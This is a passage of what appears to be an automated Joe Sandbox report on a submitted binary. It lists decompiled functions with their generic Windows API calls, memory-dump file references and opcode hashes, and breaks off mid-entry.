Part of subcall function 0013B568: DispatchMessageW.USER32(?), ref: 0013B5B6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: eeed46d082da61e70c3163bd370d16bc7661816e51c60c699889512a981e81f3
Instruction ID: 0742e5f7c9d57417f4c4f5173062f9a38faa088b8002c443570d7b712c3c8db1
Opcode Fuzzy Hash: eeed46d082da61e70c3163bd370d16bc7661816e51c60c699889512a981e81f3
Instruction Fuzzy Hash: ABE092B640435866DF02AB61EC0AFDE3BAC5B15B85F040851B200DA0E2EB78EAA08771

Uniqueness

Uniqueness Score: -1.00%

Function 0013081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00130836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0012F2D8,Crypt32.dll,00000000,0012F35C,?,?,0012F33E,?,?,?), ref: 00130858

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 38037f9a8740bf9e6736461250fc9cef7e174acd1c0f471254966070e07baa55
Instruction ID: ab6cd182683b7e054ef867ad2788ced4fee8dc70c0f351e90ac34f90b4194b9c
Opcode Fuzzy Hash: 38037f9a8740bf9e6736461250fc9cef7e174acd1c0f471254966070e07baa55
Instruction Fuzzy Hash: 74E01276800228ABDB11A7959C45FDA77ACAF093D2F040065B645D2044D7B4DA84CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0013A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0013A3E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 5da24eebbc18ee2a91f1291bf5f34f09ae4e6624fa4aeb5dc92df37d398b0656
Instruction ID: aee5ca64b2c1cc0137ffaa847fe8643ae401a517bf931bdfdbd9b2458582ede5
Opcode Fuzzy Hash: 5da24eebbc18ee2a91f1291bf5f34f09ae4e6624fa4aeb5dc92df37d398b0656
Instruction Fuzzy Hash: FEE0ED72500218EBCB10DF55C541B99BBE8EF14365F10805AE89A97241E374AE44DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00142B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00142BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00142BB5

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: d2160febc1349e0194cf01a2f7abcbdbea51b3adae6b2a1c5aa4a9c6162157a4
Instruction ID: 6d0bc03ae918b195392b1d9152923f6215347dc1d8fad59f3c9220511867c8b2
Opcode Fuzzy Hash: d2160febc1349e0194cf01a2f7abcbdbea51b3adae6b2a1c5aa4a9c6162157a4
Instruction Fuzzy Hash: CBD022359A430018CC383EB039034483B86EF61BB67F0029AF4308ACF1EF3181C0A111

Uniqueness

Uniqueness Score: -1.00%

Function 001212F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00121306
ShowWindow.USER32(00000000), ref: 0012130D

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: fa0eba368db0c5e4ca20536c38cb0e9db184b01c7e3df35a61529875a6c2dd9f
Instruction ID: f84d6de0311c5157e48f310e18cca9fb0970044275d7bea8cb13e94ddfdc4521
Opcode Fuzzy Hash: fa0eba368db0c5e4ca20536c38cb0e9db184b01c7e3df35a61529875a6c2dd9f
Instruction Fuzzy Hash: D6C0123205C200BECB010BB4DC0DC2BBBA8ABA5B12F08C908B0B5C0060E238C250EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00121A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00121A09

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e5be1252462ee527a72fc0058dd3974b2209048b3ff96fe7f7525445f12fd745
Instruction ID: 270e1796ff56849e875cbacb458043e42c45937fdc4289fcd00466b60c8a91a4
Opcode Fuzzy Hash: e5be1252462ee527a72fc0058dd3974b2209048b3ff96fe7f7525445f12fd745
Instruction Fuzzy Hash: 83C1B330A00264FFEF19CF68D498BA97BB5EF25310F1801B9EC559F296DB309964CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00123BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00123BBF

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dea4dd183fec192162a7d23571851c477c4205f1ccd96a001a73a94a9db0740a
Instruction ID: f2ba590c373ed1f99296718f7a924d1dbef813c88dece9d9af61bca1cff4552d
Opcode Fuzzy Hash: dea4dd183fec192162a7d23571851c477c4205f1ccd96a001a73a94a9db0740a
Instruction Fuzzy Hash: 9471E371500B549ECB35DB70E8459E7B7E9AF24300F41092EF6BB87241EB366AA8CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00128284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00128289

Part of subcall function 001213DC: __EH_prolog.LIBCMT ref: 001213E1

Part of subcall function 0012A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0012A598

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 0ed9fd8a82c538569ad37d19984ee75d3ecb2829b4552586e560ea447dfa6c53
Instruction ID: 08b53edbeffacfb17397a10ab2c2a1aa257b7831ac94947f6431570028370f34
Opcode Fuzzy Hash: 0ed9fd8a82c538569ad37d19984ee75d3ecb2829b4552586e560ea447dfa6c53
Instruction Fuzzy Hash: 5041D8719456689ADB24EB60DC55BEAB3B8BF20304F4404EBE08A57083EB745FD4CB10

Uniqueness

Uniqueness Score: -1.00%

Function 001213E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001213E1

Part of subcall function 00125E37: __EH_prolog.LIBCMT ref: 00125E3C

Part of subcall function 0012CE40: __EH_prolog.LIBCMT ref: 0012CE45

Part of subcall function 0012B505: __EH_prolog.LIBCMT ref: 0012B50A

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c9090b9847872a1975c92358622c9942aac87d6fda793bffd4c78dec3d8322b1
Instruction ID: 677354f4d7f385ca281871bdfe1237cc9b1da1c3e1516c2e2bf0d91f7f844760
Opcode Fuzzy Hash: c9090b9847872a1975c92358622c9942aac87d6fda793bffd4c78dec3d8322b1
Instruction Fuzzy Hash: 9A413BB0905B409EE724DF798885AE6FBE5BF29300F50492EE5FE87282CB316654CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001213DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001213E1

Part of subcall function 00125E37: __EH_prolog.LIBCMT ref: 00125E3C

Part of subcall function 0012CE40: __EH_prolog.LIBCMT ref: 0012CE45

Part of subcall function 0012B505: __EH_prolog.LIBCMT ref: 0012B50A

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cbae9f35dd3a6c614b784fa76f726d050f954ded7a715531dc521db466f32681
Instruction ID: fedd15d8d8beb64bfb08fff2623f2b788d8112826cfb1b882d29b981074cef4e
Opcode Fuzzy Hash: cbae9f35dd3a6c614b784fa76f726d050f954ded7a715531dc521db466f32681
Instruction Fuzzy Hash: 00413AB0905B409EE724DF798885AE6FBE5BF29300F50492ED5FE87282CB316654CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0013B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0013B098

Part of subcall function 001213DC: __EH_prolog.LIBCMT ref: 001213E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9c43df11f4d3de78251063a367324e077d0a058ade8155045e9aba3caa6e38f3
Instruction ID: 1b3d23160b99506cdc552e115880af954648020cad1522ca782f7ae0eea15e8c
Opcode Fuzzy Hash: 9c43df11f4d3de78251063a367324e077d0a058ade8155045e9aba3caa6e38f3
Instruction Fuzzy Hash: 9D31AD71C04259EECF15DF64D991AEEBBB4AF29300F1044AEE409B7242E775AF04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0014AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0014ACF8

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0d8c6f8f609f9234c0cd0491edd0796c0601a4b612dd3d68a3f6eb23d0f3fcae
Instruction ID: feb75788823f7120a9c5424196bed9d780a5d76d68b3fa489b105ff5612d5f72
Opcode Fuzzy Hash: 0d8c6f8f609f9234c0cd0491edd0796c0601a4b612dd3d68a3f6eb23d0f3fcae
Instruction Fuzzy Hash: D5110633E402259F9B2A9FA8EC8095A7395EF8436175B4220FD15AF6A4D730ED4187D2

Uniqueness

Uniqueness Score: -1.00%

Function 0013F2E0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 0013F312

Part of subcall function 0013FAEC: InitializeSListHead.KERNEL32(00181D30,0013F337), ref: 0013FAF1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Initialize$HeadList
String ID:
API String ID: 394358367-0
Opcode ID: 8af183ba9c39ed700a55e1ad0cddfc4c003581a3150ecdda96302d1a7402e9ee
Instruction ID: e6026e7053fa0199c9b11cf4f9b2c3fabfd99ddabf9c09da0cef58cded97e89e
Opcode Fuzzy Hash: 8af183ba9c39ed700a55e1ad0cddfc4c003581a3150ecdda96302d1a7402e9ee
Instruction Fuzzy Hash: 1C01AF98D40312A4E92037F19917B5F96885F30398F250C3CF888EA1B7EF59D4078173

Uniqueness

Uniqueness Score: -1.00%

Function 0012CE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0012CE45

Part of subcall function 00125E37: __EH_prolog.LIBCMT ref: 00125E3C

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3fefa73836f73e4aa4c3f79322a69c178689fed2e7c494043e6da17ac2c34c5a
Instruction ID: dc7e388816d6b01f885acc47470c77ef3534c92edd29694b4408ee513ecb5dca
Opcode Fuzzy Hash: 3fefa73836f73e4aa4c3f79322a69c178689fed2e7c494043e6da17ac2c34c5a
Instruction Fuzzy Hash: F811C271A00364DEEB15EB79E546BAEFBE99F64300F10045EE446D3282DB744F04CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00129215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0012921A

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9fbfd2368fdb1879a618ffeb5b52d45a46b7e59f88508f22da7443a427949f4a
Instruction ID: 250b6a71c57215e2ab5a662b70101e600de19e86b2b572901c65955e75d3ddb6
Opcode Fuzzy Hash: 9fbfd2368fdb1879a618ffeb5b52d45a46b7e59f88508f22da7443a427949f4a
Instruction Fuzzy Hash: A8018233900538EBCF16EBA8EC829DEB771BFA8750F014125E812BB152DB34CD2486A0

Uniqueness

Uniqueness Score: -1.00%

Function 00143C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00143C3F

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: e60af446eecab9ca76c714a3f39fd5e0c6fad8dd863f002e0c289831f35ed8ff
Instruction ID: f9da9af2bef549d110a408e2d116901b8e75f8e13931cf6de9af2de300d09efb
Opcode Fuzzy Hash: e60af446eecab9ca76c714a3f39fd5e0c6fad8dd863f002e0c289831f35ed8ff
Instruction Fuzzy Hash: 27F0A0362002269F8F168EA8EC40A9A77A9EF11B617144126FA25E71E0DB31EA20C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00148E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014CA2C,00000000,?,00146CBE,?,00000008,?,001491E0,?,?,?), ref: 00148E38

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7d1a60849298b3a731ffbc03f13db2f1bcb4ee4ba6f6d0340484ab443b80e675
Instruction ID: 59e3c0d4b2511c47a5951747634ab7a6ecd8f339c2e1f5cc686e10f747c47a55
Opcode Fuzzy Hash: 7d1a60849298b3a731ffbc03f13db2f1bcb4ee4ba6f6d0340484ab443b80e675
Instruction Fuzzy Hash: 9EE092312062255BEB7227799C05B9F76889F51BB8F260121FC19B70F1DF21CD0082F1

Uniqueness

Uniqueness Score: -1.00%

Function 00125ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00125AC2

Part of subcall function 0012B505: __EH_prolog.LIBCMT ref: 0012B50A

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4669a8f86be639dc0a2599844fb95a6f7e183f7b78ed70164561443d32e74e78
Instruction ID: 15adfecee039b7cea2db05ce1b77402acdcbd27e483d43ac31323322710db77a
Opcode Fuzzy Hash: 4669a8f86be639dc0a2599844fb95a6f7e183f7b78ed70164561443d32e74e78
Instruction Fuzzy Hash: 6401AF70810790DAD726EBB8C0627DEFBE4DF78304F54848DA45663283CBB41B08DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00129620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,001295D6,?,?,?,?,?,00152641,000000FF), ref: 0012963B

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
